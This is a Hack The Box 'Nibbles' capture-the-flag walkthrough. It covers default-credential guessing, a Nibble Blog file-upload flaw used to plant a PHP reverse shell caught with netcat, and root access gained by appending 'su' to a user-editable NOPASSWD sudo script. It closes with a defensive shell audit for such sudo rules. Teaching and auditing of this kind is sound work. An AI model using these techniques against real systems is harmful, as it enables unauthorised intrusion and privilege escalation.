Hack The Box – Nibbles

Enumeration

As always, we start with an nmap against the machine’s IP.

$ nmap -sC -sV 10.10.10.75
Starting Nmap 7.70 ( https://nmap.org ) at 2018-06-27 19:04 BST
Nmap scan report for 10.10.10.75
Host is up (0.067s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 c4:f8:ad:e8:f8:04:77:de:cf:15:0d:63:0a:18:7e:49 (RSA)
|   256 22:8f:b1:97:bf:0f:17:08:fc:7e:2c:8f:e9:77:3a:48 (ECDSA)
|_  256 e6:ac:27:a3:b5:a9:f1:12:3c:34:a5:5d:5b:eb:3d:e9 (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 15.29 seconds

As you can see, there's an SSH service and a web service running. Head over to the web service with your browser and you'll see a 'hello world' page.

Inspect the page source and there's an HTML comment that mentions '/nibbleblog/', so navigate to that URL: http://10.10.10.75/nibbleblog/

Nibble Blog is a simple blogging web application. Searching for vulnerabilities online, you should come across CVE-2015-6967, but we need a login to be able to perform the exploit. A little more searching and you can easily find the default login page for this app: http://10.10.10.75/nibbleblog/admin.php

Getting the credentials is very easy and just requires a little bit of guesswork.
What's the default admin username for most applications? admin.
What word is used a lot on this machine? nibbles.
Enter those credentials into the admin page and you should be logged in to the dashboard.

Nibble Blog Exploit

Details of the exploit can be found on Curesec Research Team's website. In short, the My Image plugin saves whatever you upload as image.php, so an uploaded PHP file ends up where the web server will execute it when it is requested from the browser.

To leverage this exploit, we’ll use pentestmonkey’s PHP Reverse Shell script to get a reverse shell.

Start up netcat listening on your chosen port, e.g. nc -lvnp 4447.
Change the IP and port in the PHP script to match your IP address and the port netcat is listening on. Save, then navigate to the My Image plugin in the Nibble Blog dashboard and upload the file. Ignore the errors.

Finding the content that's just been uploaded requires a little digging into the Nibble Blog code, or you could look at the Curesec Research Team's code snippet to see what's going on. Basically each plugin gets its own 'space' to store files. This plugin uses that space and saves the uploaded file as image.php. The plugin file storage directory is /content/private/plugins/my_image/. Put the two together and you should hit a page that seems to take forever to load; check your netcat listener and you should see you now have a reverse shell! Check the user's home directory for the first flag, user.txt.

PrivEsc

First we’ll run sudo -l to see what access to sudo the current user has.

$ sudo -l
sudo: unable to resolve host Nibbles: Connection timed out
Matching Defaults entries for nibbler on Nibbles:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User nibbler may run the following commands on Nibbles:
    (root) NOPASSWD: /home/nibbler/personal/stuff/monitor.sh

We can see that the user is able to run /home/nibbler/personal/stuff/monitor.sh as root without a password. Note that the script lives inside the user's own home directory, so the user controls what root will execute. Let's head over there and investigate.

$ cd /home/nibbler
$ ls
personal.zip
user.txt

No personal directory, but there's a zip. Extract the zip and you'll see it contains the directory and file we're looking for. Excellent.

$ unzip personal.zip
Archive:  personal.zip
   creating: personal/
   creating: personal/stuff/
  inflating: personal/stuff/monitor.sh  
$ ls
personal
personal.zip
user.txt
$ cd personal/stuff

Since we're able to run this shell script as root, let's append a simple su command, which will switch us to the root user. Use chmod to make the file executable and then run it.

Note: >> appends to a file, whereas > replaces the contents of a file.

$ echo "su" >> monitor.sh
$ chmod +x monitor.sh
$ sudo /home/nibbler/personal/stuff/monitor.sh
sudo: unable to resolve host Nibbles: Connection timed out
'unknown': I need something more specific.
/home/nibbler/personal/stuff/monitor.sh: 26: /home/nibbler/personal/stuff/monitor.sh: [[: not found
/home/nibbler/personal/stuff/monitor.sh: 36: /home/nibbler/personal/stuff/monitor.sh: [[: not found
/home/nibbler/personal/stuff/monitor.sh: 43: /home/nibbler/personal/stuff/monitor.sh: [[: not found
ls
monitor.sh
whoami
root

BOOM! We’re now root. Head to the root directory to collect your prize.
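The root cause of this privesc is a NOPASSWD sudo rule pointing at a script the invoking user can edit (or, as here, create). The following POSIX shell helper is an added example, not part of the original writeup: it reads `sudo -l` output, pulls out each NOPASSWD target and flags any that the current user could modify or replace. The function names sudo_rule_target, judge_target and audit_sudo_rules are my own, and the audit is run as the user named in the rule.

```shell
#!/bin/sh
# Added audit helper (not from the original writeup): given `sudo -l`
# output, flag NOPASSWD targets that the invoking user could change. This
# is exactly the condition abused on Nibbles, where a root-run script sat
# inside the user's own home directory.

# Pull the command path out of a rule line such as
#   "    (root) NOPASSWD: /home/nibbler/personal/stuff/monitor.sh"
# Only the first command of a comma-separated list is taken; lines that
# are not NOPASSWD rules print nothing.
sudo_rule_target() {
    printf '%s\n' "$1" |
        sed -n 's/.*NOPASSWD:[[:space:]]*\([^[:space:],]*\).*/\1/p'
}

# Classify one target path from the point of view of the user running
# this script (sudo's invoking user):
#   MISSING         - path does not exist, so the user may be able to
#                     create it (on Nibbles it only existed after unzip)
#   WRITABLE        - user can edit the file that root will execute
#   PARENT_WRITABLE - user can replace the file by writing its directory
#   OK              - none of the above
judge_target() {
    target="$1"
    if [ ! -e "$target" ]; then
        echo MISSING
    elif [ -w "$target" ]; then
        echo WRITABLE
    elif [ -w "$(dirname "$target")" ]; then
        echo PARENT_WRITABLE
    else
        echo OK
    fi
}

# Read `sudo -l` output on stdin and print "<verdict> <path>" for every
# rule that is not OK. An empty result means nothing to report.
audit_sudo_rules() {
    while IFS= read -r line; do
        target=$(sudo_rule_target "$line")
        [ -n "$target" ] || continue
        verdict=$(judge_target "$target")
        [ "$verdict" = OK ] || printf '%s %s\n' "$verdict" "$target"
    done
}

# On a host, run as the user being checked:  sudo -l | audit_sudo_rules
```

Run as root (the runner's case) every existing file reports WRITABLE, so interpret results from the unprivileged account the rule applies to.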